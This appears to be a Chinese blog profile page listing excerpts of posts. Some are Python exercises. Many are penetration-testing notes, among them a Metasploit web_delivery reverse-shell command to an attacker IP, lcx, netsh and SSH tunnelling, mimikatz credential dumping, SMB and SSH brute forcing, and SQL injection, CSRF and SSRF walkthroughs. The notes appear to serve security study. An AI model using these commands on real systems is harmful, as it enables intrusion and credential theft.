1 佛性死磕

尚未进行身份认证

学的更多,只为自由。

等级
TA的排名 9w+

shiro反序列化漏洞环境搭建

kali下shiro反序列化漏洞环境搭建git clone https://github.com/apache/shiro.gitgit checkout shiro-root-1.2.4 #进入shirocd samples/web安装mvn工具sudo apt-get install openjdk-8-jdksudo mkdir -p /usr/local/apache-mavenwget http://ftp.wayne.edu/apache/maven/maven-3/3.3.9/

2020-05-09 17:01:41

python3_队列结构作业

编写程序,实现自定义类,模拟队列结构。要求实现入队、出队以及修改队列大小和判断队列是否为空、是否为满的功能,同时要求在入队时如果队列已满则退出、出队时如果队列已空则等待指定功能。class duilie: def __init__(self, size=5): self._content = [] self._size = size sel...

2020-05-06 10:47:40

msf作为控制端使用

命令执行上,去拿shelluse exploit/multi/script/web_deliveryshow optionsset target 1set payload php/meterpreter/reverse_tcpset lhost 192.168.232.136run执行此代码php -d allow_url_fopen=true -r "eval(file_...

2020-05-02 18:26:10

内网渗透技术

内网穿透技术原理netshiptablesregerogEarthwormicmptunneldns2tcpc端口复用原理内网穿透技术原理:通过拿到shell的主机,要去访问内网的其他主机时候,通过监听本地端口,靶机转发目标内网主机到本地监听端口上。另一种是访问本地端口(内网主机),通过映射的方式。如下图,kali通过vpn开启的8081去访问win10的3306服务。vpn先是开启监听,通过...

2020-04-30 14:45:36

netsh端口转发

如没有ipv6netsh interface ipv6 install开启防火墙入站规则netsh interface portproxy add v4tov4 listenaddress=192.168.1.1 listenport=4444 connectaddress=192.168.1.2 connectport=6666或者netsh interface portprox...

2020-04-26 12:57:06

lcx的使用-内网穿透

lcx有两个功能映射(slave)和转发(tran)简单看个列子:映射(slave)第一步:我在攻击机上执行此命令lcx -listen 3333 2222此命令表示我监听3333端口,并把3333端口映射到2222端口第二步:我在靶机上执行此命令:lcx -slave 172.168.172.133 3333 172.168.172.201 3389此命令表示我使用sl...

2020-04-24 14:04:03

Cookie与Session的应用

简介:使用PHP代码介绍网页上Cookie和Session的使用介绍:cookie必须依靠session来实现cookie的设置<?php setcookie('admin',"www.admin.com");?><?php var_dump($_COOKIE);?>cookie的销毁<?php setcookie("admin","",t...

2020-04-23 21:05:18

python3 尼姆游戏

python3尼姆游戏是个著名的游戏,有很多变种玩法。两个玩家轮流从一堆物品中拿走一部分。在第一步中,玩家可以自由选择拿走多少物品,但是必须至少拿走一个并且最多只能拿走一半物品,然后轮到下一个玩家。拿走最后一个物品的玩家输掉游戏。在聪明模式中,计算机每次拿走足够多的物品使得堆的大小是2的幂次方减1–也就是3,7,15,31或63。除了堆的大小已经是2的幂次方减1,在其它情况下这样走都是符合游戏...

2020-04-22 08:34:25

内网渗透之SSH隧道

1.本地转发ssh -CfNg -L 1153:172.168.172.147:3389 root@172.168.172.146netstat -tulnp | grep "1153"rdesktop 127.0.0.1:11532.远程转发ssh -CfNg -R 3308:172.168.172.147:3389 root@172.168.172.143nets...

2020-04-18 01:47:34

Collatz 序列的编写

以下代码是python3.8def collatz(number): if number % 2 == 0: a = number // 2 print(a) return a else: b = number * 3 + 1 print(b) return bzs = int(...

2020-04-17 17:22:48

记一次使用burp挖掘ssrf的src过程

将存在可疑的链接的包通过burp抓下应为没有写链接,发现跳转404使用burp生成poc,复制此地址输入构造好的payload,成功跳转到burp的页面危害:可以进行钓鱼,访问恶意网站等...

2020-04-16 11:59:37

CSRF跨站请求伪造实战

先是用目录扫描一顿扫,发现一个文件打开看到是源码,里面还有修改密码的网页并且发现没有限制referer和token立马使用CSRF提交通过上面找到的后台路经尝试登陆来到后台...

2020-04-14 14:37:35

python3编写随机验证码不区分大小写

import random,stringdef main(): passwd="" num=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H','I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q','R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', ...

2020-04-09 13:38:32

sql注入爆出演练

使用‘不报错看是否是数字型,and 1=1再and 1=2,不报错盲注第一步,获取数据库长度获取数据库的名字,判断出第一个库的第一个字母发现为s以此类推为security...

2020-04-05 10:57:37

使用Python3对Excel进行修改

本列展示如何在Excel中自动的计算值以及如何自动的添加表格#别名import openpyxl as xlfrom openpyxl.chart import BarChart,Reference#加载对象wb = xl.load_workbook('transactions.xlsx')sheet = wb['Sheet1'] #excel中的下面的Sheet1cell =...

2020-04-04 18:29:50

python3模拟抓狐狸小游戏

编写程序,模拟抓狐狸小游戏。假设一共有一排5个洞口,小狐狸最开始的时候在其中一个洞口,然后玩家随机打开一个洞口,如果里面有狐狸就抓到了。如果洞口里没有狐狸就第二天再来抓,但是第二天狐狸会在玩家来抓之前调到隔壁洞口里。import randomdef sj(): csj = random.randint(1, 5) return csja = sj()Count = 0...

2020-04-01 08:52:21

windows忘了密码以及后渗透读取密码

windows内存读取使用quarkspwdump也可有获得使用mimikatz也可以破解privilege::debugsekurlsa::logonpasswords拿到hash并且给出了密码

2020-03-31 17:00:23

爆破445端口和22端口拿shell

工具hydua、nmap使用nmap扫描是否开启smb服务即445端口发现开启,制作字典passwd.txt使用v

2020-03-31 12:48:33

2020-3-28_奇安信面试题

此面试为渗透测试工程师的面试,题型为单选题、多选题的简答题。内容说难也难,说简单也简单。你遇到过就简单了。№1:网络中广泛的加密:答案:端对端的加密№2:cobale strike的端口:答案:50050№3:Linux的文件权限中第四位的权限代表:二三四 位代表文件所有者(user)拥有的权限,五六七 位代表组群(group)拥有的权限,八九十 位代表其他人(other)拥有...

2020-03-30 09:11:28

清晰明了的Wireshark基础过滤规则

Wireshark过滤规则那么多,了解这几个,基本也就够用。不够我们再查也不错。了解几个名词:src和dst是源和目的№.1过滤ip:ip.src==127.0.0.1ip.dst==127.0.0.1№.2过滤端口:tcp.port==80tcp.srcport==80tcp.dstport==80№.3协议过滤:直接写协议名称http№.4http模式过滤:...

2020-03-28 08:42:54

查看更多

勋章 我的勋章
  • 签到王者
    签到王者
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 技术圈认证
    技术圈认证
    用户完成年度认证,即可获得
  • 阅读者勋章Lv1
    阅读者勋章Lv1
    授予在CSDN APP累计阅读博文达到3天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。